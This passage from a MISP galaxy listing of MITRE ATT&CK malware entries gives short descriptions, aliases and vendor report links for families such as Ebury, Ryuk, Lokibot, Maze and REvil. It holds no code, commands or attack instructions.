https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-the-multifaceted-malware/?_ga=2.165628854.808042651.1508120821-744063452.1505819992

https://www.cyber.nj.gov/threat-profiles/trojan-variants/ursnif

https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html

https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality

EvilBunny - S0396

[EvilBunny](https://attack.mitre.org/software/S0396) is a C++ malware sample observed since 2011 that was designed to be an execution platform for Lua scripts.(Citation: Cyphort EvilBunny Dec 2014)

The tag is: misp-galaxy:mitre-malware="EvilBunny - S0396"

EvilBunny - S0396 is also known as:

  • EvilBunny

Table 7734. Table References

Links

https://attack.mitre.org/software/S0396

https://web.archive.org/web/20150311013500/http://www.cyphort.com/evilbunny-malware-instrumented-lua/

CoinTicker - S0369

[CoinTicker](https://attack.mitre.org/software/S0369) is a malicious application that poses as a cryptocurrency price ticker and installs components of the open source backdoors EvilOSX and EggShell.(Citation: CoinTicker 2019)

The tag is: misp-galaxy:mitre-malware="CoinTicker - S0369"

CoinTicker - S0369 is also known as:

  • CoinTicker

Table 7735. Table References

Links

https://attack.mitre.org/software/S0369

https://blog.malwarebytes.com/threat-analysis/2018/10/mac-cryptocurrency-ticker-app-installs-backdoors/

CaddyWiper - S0693

[CaddyWiper](https://attack.mitre.org/software/S0693) is a destructive data wiper that has been used in attacks against organizations in Ukraine since at least March 2022.(Citation: ESET CaddyWiper March 2022)(Citation: Cisco CaddyWiper March 2022)

The tag is: misp-galaxy:mitre-malware="CaddyWiper - S0693"

CaddyWiper - S0693 is also known as:

  • CaddyWiper

Table 7736. Table References

Links

https://attack.mitre.org/software/S0693

https://blog.talosintelligence.com/2022/03/threat-advisory-caddywiper.html

https://www.welivesecurity.com/2022/03/15/caddywiper-new-wiper-malware-discovered-ukraine

Ebury - S0377

[Ebury](https://attack.mitre.org/software/S0377) is an SSH backdoor targeting Linux operating systems. Attackers require root-level access, which allows them to replace SSH binaries (ssh, sshd, ssh-add, etc.) or modify a shared library used by OpenSSH (libkeyutils).(Citation: ESET Ebury Feb 2014)(Citation: BleepingComputer Ebury March 2017)(Citation: ESET Ebury Oct 2017)

The tag is: misp-galaxy:mitre-malware="Ebury - S0377"

Ebury - S0377 is also known as:

  • Ebury

Table 7737. Table References

Links

https://attack.mitre.org/software/S0377

https://www.bleepingcomputer.com/news/security/russian-hacker-pleads-guilty-for-role-in-infamous-linux-ebury-malware/

https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/

https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/

KeyBoy - S0387

[KeyBoy](https://attack.mitre.org/software/S0387) is malware that has been used in targeted campaigns against members of the Tibetan Parliament in 2016.(Citation: CitizenLab KeyBoy Nov 2016)(Citation: PWC KeyBoys Feb 2017)

The tag is: misp-galaxy:mitre-malware="KeyBoy - S0387"

KeyBoy - S0387 is also known as:

  • KeyBoy

Table 7738. Table References

Links

https://attack.mitre.org/software/S0387

https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/

https://citizenlab.ca/2016/11/parliament-keyboy/

https://web.archive.org/web/20211129064701/https://www.pwc.co.uk/issues/cyber-security-services/research/the-keyboys-are-back-in-town.html

LoJax - S0397

[LoJax](https://attack.mitre.org/software/S0397) is a UEFI rootkit used by [APT28](https://attack.mitre.org/groups/G0007) to persist remote access software on targeted systems.(Citation: ESET LoJax Sept 2018)

The tag is: misp-galaxy:mitre-malware="LoJax - S0397"

LoJax - S0397 is also known as:

  • LoJax

Table 7739. Table References

Links

https://attack.mitre.org/software/S0397

https://www.welivesecurity.com/wp-content/uploads/2018/09/ESET-LoJax.pdf

YAHOYAH - S0388

[YAHOYAH](https://attack.mitre.org/software/S0388) is a Trojan used by [Tropic Trooper](https://attack.mitre.org/groups/G0081) as a second-stage backdoor.(Citation: TrendMicro TropicTrooper 2015)

The tag is: misp-galaxy:mitre-malware="YAHOYAH - S0388"

YAHOYAH - S0388 is also known as:

  • YAHOYAH

Table 7740. Table References

Links

https://attack.mitre.org/software/S0388

https://documents.trendmicro.com/assets/wp/wp-operation-tropic-trooper.pdf

HyperBro - S0398

[HyperBro](https://attack.mitre.org/software/S0398) is a custom in-memory backdoor used by [Threat Group-3390](https://attack.mitre.org/groups/G0027).(Citation: Unit42 Emissary Panda May 2019)(Citation: Securelist LuckyMouse June 2018)(Citation: Hacker News LuckyMouse June 2018)

The tag is: misp-galaxy:mitre-malware="HyperBro - S0398"

HyperBro - S0398 is also known as:

  • HyperBro

Table 7741. Table References

Links

https://attack.mitre.org/software/S0398

https://securelist.com/luckymouse-hits-national-data-center/86083/

https://thehackernews.com/2018/06/chinese-watering-hole-attack.html

https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/

JCry - S0389

[JCry](https://attack.mitre.org/software/S0389) is ransomware written in Go. It was identified as part of the #OpJerusalem 2019 campaign.(Citation: Carbon Black JCry May 2019)

The tag is: misp-galaxy:mitre-malware="JCry - S0389"

JCry - S0389 is also known as:

  • JCry

Table 7742. Table References

Links

https://attack.mitre.org/software/S0389

https://www.carbonblack.com/2019/05/14/cb-tau-threat-intelligence-notification-jcry-ransomware-pretends-to-be-adobe-flash-player-update-installer/

Pallas - S0399

[Pallas](https://attack.mitre.org/software/S0399) is mobile surveillanceware that was custom-developed by [Dark Caracal](https://attack.mitre.org/groups/G0070).(Citation: Lookout Dark Caracal Jan 2018)

The tag is: misp-galaxy:mitre-malware="Pallas - S0399"

Pallas - S0399 is also known as:

  • Pallas

Table 7743. Table References

Links

https://attack.mitre.org/software/S0399

https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf

ShimRat - S0444

[ShimRat](https://attack.mitre.org/software/S0444) has been used by the suspected China-based adversary [Mofang](https://attack.mitre.org/groups/G0103) in campaigns targeting multiple countries and sectors including government, military, critical infrastructure, automobile, and weapons development. The name "[ShimRat](https://attack.mitre.org/software/S0444)" comes from the malware’s extensive use of Windows Application Shimming to maintain persistence. (Citation: FOX-IT May 2016 Mofang)

The tag is: misp-galaxy:mitre-malware="ShimRat - S0444"

ShimRat - S0444 is also known as:

  • ShimRat

Table 7744. Table References

Links

https://attack.mitre.org/software/S0444

https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf

HenBox - S0544

[HenBox](https://attack.mitre.org/software/S0544) is Android malware that attempts to only execute on Xiaomi devices running the MIUI operating system. [HenBox](https://attack.mitre.org/software/S0544) has primarily been used to target Uyghurs, a minority Turkic ethnic group.(Citation: Palo Alto HenBox)

The tag is: misp-galaxy:mitre-malware="HenBox - S0544"

HenBox - S0544 is also known as:

  • HenBox

Table 7745. Table References

Links

https://attack.mitre.org/software/S0544

https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/

Cadelspy - S0454

[Cadelspy](https://attack.mitre.org/software/S0454) is a backdoor that has been used by [APT39](https://attack.mitre.org/groups/G0087).(Citation: Symantec Chafer Dec 2015)

The tag is: misp-galaxy:mitre-malware="Cadelspy - S0454"

Cadelspy - S0454 is also known as:

  • Cadelspy

Table 7746. Table References

Links

https://attack.mitre.org/software/S0454

https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets

ObliqueRAT - S0644

[ObliqueRAT](https://attack.mitre.org/software/S0644) is a remote access trojan, similar to [Crimson](https://attack.mitre.org/software/S0115), that has been in use by [Transparent Tribe](https://attack.mitre.org/groups/G0134) since at least 2020.(Citation: Talos Oblique RAT March 2021)(Citation: Talos Transparent Tribe May 2021)

The tag is: misp-galaxy:mitre-malware="ObliqueRAT - S0644"

ObliqueRAT - S0644 is also known as:

  • ObliqueRAT

Table 7747. Table References

Links

https://attack.mitre.org/software/S0644

https://blog.talosintelligence.com/2021/02/obliquerat-new-campaign.html

https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html

SYSCON - S0464

[SYSCON](https://attack.mitre.org/software/S0464) is a backdoor that has been in use since at least 2017 and has been associated with campaigns involving North Korean themes. [SYSCON](https://attack.mitre.org/software/S0464) has been delivered by the [CARROTBALL](https://attack.mitre.org/software/S0465) and [CARROTBAT](https://attack.mitre.org/software/S0462) droppers.(Citation: Unit 42 CARROTBAT November 2018)(Citation: Unit 42 CARROTBAT January 2020)

The tag is: misp-galaxy:mitre-malware="SYSCON - S0464"

SYSCON - S0464 is also known as:

  • SYSCON

Table 7748. Table References

Links

https://attack.mitre.org/software/S0464

https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/

https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/

Ryuk - S0446

[Ryuk](https://attack.mitre.org/software/S0446) is a ransomware designed to target enterprise environments that has been used in attacks since at least 2018. [Ryuk](https://attack.mitre.org/software/S0446) shares code similarities with Hermes ransomware.(Citation: CrowdStrike Ryuk January 2019)(Citation: FireEye Ryuk and Trickbot January 2019)(Citation: FireEye FIN6 Apr 2019)

The tag is: misp-galaxy:mitre-malware="Ryuk - S0446"

Ryuk - S0446 is also known as:

  • Ryuk

Table 7749. Table References

Links

https://attack.mitre.org/software/S0446

https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/

https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/

https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html

https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html

Lokibot - S0447

[Lokibot](https://attack.mitre.org/software/S0447) is a widely distributed information stealer that was first reported in 2015. It is designed to steal sensitive information such as usernames, passwords, cryptocurrency wallets, and other credentials. [Lokibot](https://attack.mitre.org/software/S0447) can also create a backdoor into infected systems to allow an attacker to install additional payloads.(Citation: Infoblox Lokibot January 2019)(Citation: Morphisec Lokibot April 2020)(Citation: CISA Lokibot September 2020)

The tag is: misp-galaxy:mitre-malware="Lokibot - S0447"

Lokibot - S0447 is also known as:

  • Lokibot

Table 7750. Table References

Links

https://attack.mitre.org/software/S0447

https://blog.morphisec.com/lokibot-with-autoit-obfuscator-frenchy-shellcode

https://blog.talosintelligence.com/2021/01/a-deep-dive-into-lokibot-infection-chain.html

https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--22

https://us-cert.cisa.gov/ncas/alerts/aa20-266a

Carberp - S0484

[Carberp](https://attack.mitre.org/software/S0484) is a credential and information stealing malware that has been active since at least 2009. [Carberp](https://attack.mitre.org/software/S0484)'s source code was leaked online in 2013, and subsequently used as the foundation for the [Carbanak](https://attack.mitre.org/software/S0030) backdoor.(Citation: Trend Micro Carberp February 2014)(Citation: KasperskyCarbanak)(Citation: RSA Carbanak November 2017)

The tag is: misp-galaxy:mitre-malware="Carberp - S0484"

Carberp - S0484 is also known as:

  • Carberp

Table 7751. Table References

Links

https://attack.mitre.org/software/S0484

https://securelist.com/the-great-bank-robbery-the-carbanak-apt/68732/

https://www.rsa.com/content/dam/en/white-paper/the-carbanak-fin7-syndicate.pdf

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/carberp

Maze - S0449

[Maze](https://attack.mitre.org/software/S0449) ransomware, previously known as "ChaCha", was discovered in May 2019. In addition to encrypting files on victim machines for impact, [Maze](https://attack.mitre.org/software/S0449) operators conduct information stealing campaigns prior to encryption and post the information online to extort affected companies.(Citation: FireEye Maze May 2020)(Citation: McAfee Maze March 2020)(Citation: Sophos Maze VM September 2020)

The tag is: misp-galaxy:mitre-malware="Maze - S0449"

Maze - S0449 is also known as:

  • Maze

Table 7752. Table References

Links

https://attack.mitre.org/software/S0449

https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-technique/

https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/

Zen - S0494

[Zen](https://attack.mitre.org/software/S0494) is Android malware that was first seen in 2013.(Citation: Google Security Zen)

The tag is: misp-galaxy:mitre-malware="Zen - S0494"

Zen - S0494 is also known as:

  • Zen

Table 7753. Table References

Links

https://attack.mitre.org/software/S0494

https://security.googleblog.com/2019/01/pha-family-highlights-zen-and-its.html

TERRACOTTA - S0545

[TERRACOTTA](https://attack.mitre.org/software/S0545) is an ad fraud botnet that has been capable of generating over 2 billion fraudulent requests per week.(Citation: WhiteOps TERRACOTTA)

The tag is: misp-galaxy:mitre-malware="TERRACOTTA - S0545"

TERRACOTTA - S0545 is also known as:

  • TERRACOTTA

Table 7754. Table References

Links

https://attack.mitre.org/software/S0545

https://www.whiteops.com/blog/terracotta-android-malware-a-technical-study

Egregor - S0554

[Egregor](https://attack.mitre.org/software/S0554) is a Ransomware-as-a-Service (RaaS) tool that was first observed in September 2020. Researchers have noted code similarities between [Egregor](https://attack.mitre.org/software/S0554) and Sekhmet ransomware, as well as [Maze](https://attack.mitre.org/software/S0449) ransomware.(Citation: NHS Digital Egregor Nov 2020)(Citation: Cyble Egregor Oct 2020)(Citation: Security Boulevard Egregor Oct 2020)

The tag is: misp-galaxy:mitre-malware="Egregor - S0554"

Egregor - S0554 is also known as:

  • Egregor

Table 7755. Table References

Links

https://attack.mitre.org/software/S0554

https://cybleinc.com/2020/10/31/egregor-ransomware-a-deep-dive-into-its-activities-and-techniques/

https://digital.nhs.uk/cyber-alerts/2020/cc-3681#summary

https://securityboulevard.com/2020/10/egregor-sekhmets-cousin/

Metamorfo - S0455

[Metamorfo](https://attack.mitre.org/software/S0455) is a Latin-American banking trojan operated by a Brazilian cybercrime group that has been active since at least April 2018. The group focuses on targeting banks and cryptocurrency services in Brazil and Mexico.(Citation: Medium Metamorfo Apr 2020)(Citation: ESET Casbaneiro Oct 2019)

The tag is: misp-galaxy:mitre-malware="Metamorfo - S0455"

Metamorfo - S0455 is also known as:

  • Metamorfo

  • Casbaneiro

Table 7756. Table References

Links

https://attack.mitre.org/software/S0455

https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767

https://www.welivesecurity.com/2019/10/03/casbaneiro-trojan-dangerous-cooking/

BlackMould - S0564

[BlackMould](https://attack.mitre.org/software/S0564) is a web shell based on [China Chopper](https://attack.mitre.org/software/S0020) for servers running Microsoft IIS. First reported in December 2019, it has been used in malicious campaigns by [GALLIUM](https://attack.mitre.org/groups/G0093) against telecommunication providers.(Citation: Microsoft GALLIUM December 2019)

The tag is: misp-galaxy:mitre-malware="BlackMould - S0564"

BlackMould - S0564 is also known as:

  • BlackMould

Table 7757. Table References

Links

https://attack.mitre.org/software/S0564

https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/

ProLock - S0654

[ProLock](https://attack.mitre.org/software/S0654) is a ransomware strain that has been used in Big Game Hunting (BGH) operations since at least 2020, often obtaining initial access with [QakBot](https://attack.mitre.org/software/S0650). [ProLock](https://attack.mitre.org/software/S0654) is the successor to PwndLocker ransomware which was found to contain a bug allowing decryption without ransom payment in 2019.(Citation: Group IB Ransomware September 2020)

The tag is: misp-galaxy:mitre-malware="ProLock - S0654"

ProLock - S0654 is also known as:

  • ProLock

Table 7758. Table References

Links

https://attack.mitre.org/software/S0654

https://groupib.pathfactory.com/ransomware-reports/prolock_wp

SharpStage - S0546

[SharpStage](https://attack.mitre.org/software/S0546) is a .NET malware with backdoor capabilities.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020)

The tag is: misp-galaxy:mitre-malware="SharpStage - S0546"

SharpStage - S0546 is also known as:

  • SharpStage

Table 7759. Table References

Links

https://attack.mitre.org/software/S0546

https://www.bleepingcomputer.com/news/security/hacking-group-s-new-malware-abuses-google-and-facebook-services/

https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf

BendyBear - S0574

[BendyBear](https://attack.mitre.org/software/S0574) is an x64 shellcode for a stage-zero implant designed to download malware from a C2 server. First discovered in August 2020, [BendyBear](https://attack.mitre.org/software/S0574) shares a variety of features with [Waterbear](https://attack.mitre.org/software/S0579), malware previously attributed to the Chinese cyber espionage group [BlackTech](https://attack.mitre.org/groups/G0098).(Citation: Unit42 BendyBear Feb 2021)

The tag is: misp-galaxy:mitre-malware="BendyBear - S0574"

BendyBear - S0574 is also known as:

  • BendyBear

Table 7760. Table References

Links

https://attack.mitre.org/software/S0574

https://unit42.paloaltonetworks.com/bendybear-shellcode-blacktech/

BackConfig - S0475

[BackConfig](https://attack.mitre.org/software/S0475) is a custom Trojan with a flexible plugin architecture that has been used by [Patchwork](https://attack.mitre.org/groups/G0040).(Citation: Unit 42 BackConfig May 2020)

The tag is: misp-galaxy:mitre-malware="BackConfig - S0475"

BackConfig - S0475 is also known as:

  • BackConfig

Table 7761. Table References

Links

https://attack.mitre.org/software/S0475

https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/

DropBook - S0547

[DropBook](https://attack.mitre.org/software/S0547) is a Python-based backdoor compiled with PyInstaller.(Citation: Cybereason Molerats Dec 2020)

The tag is: misp-galaxy:mitre-malware="DropBook - S0547"

DropBook - S0547 is also known as:

  • DropBook

Table 7762. Table References

Links

https://attack.mitre.org/software/S0547

https://www.bleepingcomputer.com/news/security/hacking-group-s-new-malware-abuses-google-and-facebook-services/

https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf

Netwalker - S0457

[Netwalker](https://attack.mitre.org/software/S0457) is fileless ransomware written in PowerShell and executed directly in memory.(Citation: TrendMicro Netwalker May 2020)

The tag is: misp-galaxy:mitre-malware="Netwalker - S0457"

Netwalker - S0457 is also known as:

  • Netwalker

Table 7763. Table References

Links

https://attack.mitre.org/software/S0457

https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/

AppleJeus - S0584

[AppleJeus](https://attack.mitre.org/software/S0584) is a family of downloaders initially discovered in 2018 embedded within trojanized cryptocurrency applications. [AppleJeus](https://attack.mitre.org/software/S0584) has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032), targeting companies in the energy, finance, government, industry, technology, and telecommunications sectors, and several countries including the United States, United Kingdom, South Korea, Australia, Brazil, New Zealand, and Russia. [AppleJeus](https://attack.mitre.org/software/S0584) has been used to distribute the [FALLCHILL](https://attack.mitre.org/software/S0181) RAT.(Citation: CISA AppleJeus Feb 2021)

The tag is: misp-galaxy:mitre-malware="AppleJeus - S0584"

AppleJeus - S0584 is also known as:

  • AppleJeus

Table 7764. Table References

Links

https://attack.mitre.org/software/S0584

https://us-cert.cisa.gov/ncas/alerts/aa21-048a

Mandrake - S0485

[Mandrake](https://attack.mitre.org/software/S0485) is a sophisticated Android espionage platform that has been active in the wild since at least 2016. [Mandrake](https://attack.mitre.org/software/S0485) is actively maintained, and its operators use its capabilities selectively against chosen targets.

[Mandrake](https://attack.mitre.org/software/S0485) went undetected for several years by shipping inside otherwise functional, ad-free applications backed by a social media presence and genuine user reviews. The malicious functionality is only activated when the operators issue a specific command.(Citation: Bitdefender Mandrake)

The tag is: misp-galaxy:mitre-malware="Mandrake - S0485"

Mandrake - S0485 is also known as:

  • Mandrake

  • oxide

  • briar

  • ricinus

  • darkmatter

Table 7765. Table References

Links

https://attack.mitre.org/software/S0485

https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf

Ramsay - S0458

[Ramsay](https://attack.mitre.org/software/S0458) is an information stealing malware framework designed to collect and exfiltrate sensitive documents, including from air-gapped systems. Researchers have identified overlaps between [Ramsay](https://attack.mitre.org/software/S0458) and the [Darkhotel](https://attack.mitre.org/groups/G0012)-associated Retro malware.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)

The tag is: misp-galaxy:mitre-malware="Ramsay - S0458"

Ramsay - S0458 is also known as:

  • Ramsay

Table 7766. Table References

Links

https://attack.mitre.org/software/S0458

https://www.programmersought.com/article/62493896999/

https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/

RDAT - S0495

[RDAT](https://attack.mitre.org/software/S0495) is a backdoor used by the suspected Iranian threat group [OilRig](https://attack.mitre.org/groups/G0049). [RDAT](https://attack.mitre.org/software/S0495) was originally identified in 2017 and targeted companies in the telecommunications sector.(Citation: Unit42 RDAT July 2020)

The tag is: misp-galaxy:mitre-malware="RDAT - S0495"

RDAT - S0495 is also known as:

  • RDAT

Table 7767. Table References

Links

https://attack.mitre.org/software/S0495

https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/

SilkBean - S0549

[SilkBean](https://attack.mitre.org/software/S0549) is Android surveillanceware with full remote access tool (RAT) functionality that has been used to target the Uyghur ethnic group.(Citation: Lookout Uyghur Campaign)

The tag is: misp-galaxy:mitre-malware="SilkBean - S0549"

SilkBean - S0549 is also known as:

  • SilkBean

Table 7768. Table References

Links

https://attack.mitre.org/software/S0549

https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf

MechaFlounder - S0459

[MechaFlounder](https://attack.mitre.org/software/S0459) is a Python-based remote access tool (RAT) that has been used by [APT39](https://attack.mitre.org/groups/G0087). The payload combines actor-developed code with code snippets freely available online in development communities.(Citation: Unit 42 MechaFlounder March 2019)

The tag is: misp-galaxy:mitre-malware="MechaFlounder - S0459"

MechaFlounder - S0459 is also known as:

  • MechaFlounder

Table 7769. Table References

Links

https://attack.mitre.org/software/S0459

https://unit42.paloaltonetworks.com/new-python-based-payload-mechaflounder-used-by-chafer/

SpicyOmelette - S0646

[SpicyOmelette](https://attack.mitre.org/software/S0646) is a JavaScript based remote access tool that has been used by [Cobalt Group](https://attack.mitre.org/groups/G0080) since at least 2018.(Citation: Secureworks GOLD KINGSWOOD September 2018)

The tag is: misp-galaxy:mitre-malware="SpicyOmelette - S0646"

SpicyOmelette - S0646 is also known as:

  • SpicyOmelette

Table 7770. Table References

Links

https://attack.mitre.org/software/S0646

https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish

Pandora - S0664

[Pandora](https://attack.mitre.org/software/S0664) is a multistage kernel rootkit with backdoor functionality that has been in use by [Threat Group-3390](https://attack.mitre.org/groups/G0027) since at least 2020.(Citation: Trend Micro Iron Tiger April 2021)

The tag is: misp-galaxy:mitre-malware="Pandora - S0664"

Pandora - S0664 is also known as:

  • Pandora

Table 7771. Table References

Links

https://attack.mitre.org/software/S0664

https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html

WindTail - S0466

[WindTail](https://attack.mitre.org/software/S0466) is a macOS surveillance implant used by [Windshift](https://attack.mitre.org/groups/G0112). [WindTail](https://attack.mitre.org/software/S0466) shares code similarities with Hack Back (a.k.a. KitM OSX).(Citation: SANS Windshift August 2018)(Citation: objective-see windtail1 dec 2018)(Citation: objective-see windtail2 jan 2019)

The tag is: misp-galaxy:mitre-malware="WindTail - S0466"

WindTail - S0466 is also known as:

  • WindTail

Table 7772. Table References

Links

https://attack.mitre.org/software/S0466

https://objective-see.com/blog/blog_0x3B.html

https://objective-see.com/blog/blog_0x3D.html

https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf

CharmPower - S0674

[CharmPower](https://attack.mitre.org/software/S0674) is a PowerShell-based, modular backdoor that has been used by [Magic Hound](https://attack.mitre.org/groups/G0059) since at least 2022.(Citation: Check Point APT35 CharmPower January 2022)

The tag is: misp-galaxy:mitre-malware="CharmPower - S0674"

CharmPower - S0674 is also known as:

  • CharmPower

Table 7773. Table References

Links

https://attack.mitre.org/software/S0674

https://research.checkpoint.com/2022/apt35-exploits-log4j-vulnerability-to-distribute-new-modular-powershell-toolkit/

TajMahal - S0467

[TajMahal](https://attack.mitre.org/software/S0467) is a multifunctional spying framework that has been in use since at least 2014. [TajMahal](https://attack.mitre.org/software/S0467) consists of two separate packages, named Tokyo and Yokohama, and can deploy up to 80 plugins.(Citation: Kaspersky TajMahal April 2019)

The tag is: misp-galaxy:mitre-malware="TajMahal - S0467"

TajMahal - S0467 is also known as:

  • TajMahal

Table 7774. Table References

Links

https://attack.mitre.org/software/S0467

https://securelist.com/project-tajmahal/90240/

Turian - S0647

[Turian](https://attack.mitre.org/software/S0647) is a backdoor that has been used by [BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) to target Ministries of Foreign Affairs, telecommunication companies, and charities in Africa, Europe, the Middle East, and Asia. First reported in 2021, [Turian](https://attack.mitre.org/software/S0647) is likely related to Quarian, an older backdoor that was last observed being used in 2013 against diplomatic targets in Syria and the United States.(Citation: ESET BackdoorDiplomacy Jun 2021)

The tag is: misp-galaxy:mitre-malware="Turian - S0647"

Turian - S0647 is also known as:

  • Turian

Table 7775. Table References

Links

https://attack.mitre.org/software/S0647

https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/

Valak - S0476

[Valak](https://attack.mitre.org/software/S0476) is a multi-stage modular malware that can function as a standalone information stealer or downloader, first observed in 2019 targeting enterprises in the US and Germany.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)

The tag is: misp-galaxy:mitre-malware="Valak - S0476"

Valak - S0476 is also known as:

  • Valak

Table 7776. Table References

Links

https://attack.mitre.org/software/S0476

https://unit42.paloaltonetworks.com/valak-evolution/

https://www.cybereason.com/blog/valak-more-than-meets-the-eye

Bonadan - S0486

[Bonadan](https://attack.mitre.org/software/S0486) is a malicious version of OpenSSH which acts as a custom backdoor. [Bonadan](https://attack.mitre.org/software/S0486) has been active since at least 2018 and combines a new cryptocurrency-mining module with the same credential-stealing module used by the Onderon family of backdoors.(Citation: ESET ForSSHe December 2018)

The tag is: misp-galaxy:mitre-malware="Bonadan - S0486"

Bonadan - S0486 is also known as:

  • Bonadan

Table 7777. Table References

Links

https://attack.mitre.org/software/S0486

https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf

Skidmap - S0468

[Skidmap](https://attack.mitre.org/software/S0468) is a kernel-mode rootkit used for cryptocurrency mining.(Citation: Trend Micro Skidmap)

The tag is: misp-galaxy:mitre-malware="Skidmap - S0468"

Skidmap - S0468 is also known as:

  • Skidmap

Table 7778. Table References

Links

https://attack.mitre.org/software/S0468

https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/

ABK - S0469

[ABK](https://attack.mitre.org/software/S0469) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)

The tag is: misp-galaxy:mitre-malware="ABK - S0469"

ABK - S0469 is also known as:

  • ABK

Table 7779. Table References

Links

https://attack.mitre.org/software/S0469

https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf

SMOKEDHAM - S0649

[SMOKEDHAM](https://attack.mitre.org/software/S0649) is a PowerShell-based .NET backdoor that was first reported in May 2021; it has been used by at least one ransomware-as-a-service affiliate.(Citation: FireEye Shining A Light on DARKSIDE May 2021)(Citation: FireEye SMOKEDHAM June 2021)

The tag is: misp-galaxy:mitre-malware="SMOKEDHAM - S0649"

SMOKEDHAM - S0649 is also known as:

  • SMOKEDHAM

Table 7780. Table References

Links

https://attack.mitre.org/software/S0649

https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html

https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html

DRATzarus - S0694

[DRATzarus](https://attack.mitre.org/software/S0694) is a remote access tool (RAT) that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032) to target defense and aerospace organizations globally since at least summer 2020. [DRATzarus](https://attack.mitre.org/software/S0694) shares similarities with [Bankshot](https://attack.mitre.org/software/S0239), which was used by [Lazarus Group](https://attack.mitre.org/groups/G0032) in 2017 to target the Turkish financial sector.(Citation: ClearSky Lazarus Aug 2020)

The tag is: misp-galaxy:mitre-malware="DRATzarus - S0694"

DRATzarus - S0694 is also known as:

  • DRATzarus

Table 7781. Table References

Links

https://attack.mitre.org/software/S0694

https://www.clearskysec.com/wp-content/uploads/2020/08/Dream-Job-Campaign.pdf

REvil - S0496

[REvil](https://attack.mitre.org/software/S0496) is a ransomware family that has been linked to the [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) group and operated as ransomware-as-a-service (RaaS) since at least April 2019. [REvil](https://attack.mitre.org/software/S0496), which has been used against organizations in the manufacturing, transportation, and electric sectors, is highly configurable and shares code similarities with the GandCrab RaaS.(Citation: Secureworks REvil September 2019)(Citation: Intel 471 REvil March 2020)(Citation: Group IB Ransomware May 2020)

The tag is: misp-galaxy:mitre-malware="REvil - S0496"

REvil - S0496 is also known as:

  • REvil

  • Sodin

  • Sodinokibi

Table 7782. Table References

Links

https://attack.mitre.org/software/S0496

https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html

https://intel471.com/blog/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/

https://securelist.com/sodin-ransomware/91473/

